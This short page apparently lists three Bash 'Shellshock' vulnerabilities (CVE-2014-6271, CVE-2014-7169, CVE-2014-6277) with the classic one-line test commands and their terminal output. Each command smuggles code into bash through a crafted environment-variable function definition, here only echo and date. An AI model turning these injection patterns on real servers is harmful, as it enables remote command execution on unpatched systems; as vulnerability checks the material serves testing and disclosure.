1989

CVE-2014-6271

the original Shellshock


$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
						

CVE-2014-7169

aka AfterShock


$ env var='() {(a)=>\' bash -c "echo date"; cat echo
bash: var: line 1: syntax error near unexpected token `='
bash: var: line 1: `'
bash: error importing function definition for `var'
Tue Oct  7 02:09:01 EDT 2014
						

CVE-2014-6277

still not fixed


$ var='() { echo vulnerable; }' bash -c var
vulnerable